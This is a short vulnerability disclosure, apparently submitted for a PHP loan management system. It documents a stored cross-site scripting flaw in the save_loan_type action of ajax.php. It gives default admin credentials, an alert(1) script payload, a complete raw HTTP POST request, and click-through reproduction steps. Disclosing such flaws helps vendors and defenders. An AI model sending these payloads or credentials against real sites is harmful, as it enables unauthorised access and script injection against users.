Vul_Author: Kai Wang
Login Account:admin Password:admin123
Vulnerability File: /Loan/ajax.php
Vulnerability location: /Loan/ajax.php?action=save_loan_type HTTP/1.1
[+] Payload: <script>alert(1)</script>
Tested on Windows 10, phpStudy
There is an example with alert:
POST /Loan/ajax.php?action=save_loan_type HTTP/1.1
Host: 10.12.180.79
Content-Length: 362
Accept: */*
X-Requested-With: XMLHttpRequest
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/111.0.0.0 Safari/537.36 Edg/111.0.1661.41
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryl0Dh1LXu5fRCTYLI
Origin: http://10.12.180.79
Referer: http://10.12.180.79/Loan/index.php?page=loan_type
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9,en;q=0.8,en-GB;q=0.7,en-US;q=0.6
Cookie: PHPSESSID=d4me9tekbcuef2k8k1qupv9i0t
Connection: close
------WebKitFormBoundaryl0Dh1LXu5fRCTYLI
Content-Disposition: form-data; name="id"
------WebKitFormBoundaryl0Dh1LXu5fRCTYLI
Content-Disposition: form-data; name="type_name"
<script>alert(1)</script>
------WebKitFormBoundaryl0Dh1LXu5fRCTYLI
Content-Disposition: form-data; name="description"
test loans
------WebKitFormBoundaryl0Dh1LXu5fRCTYLI--
Get into the Loan Types page,click the edit button as shown in the image
input a XSS script in the 'Type' input box
click save and you will see an alert
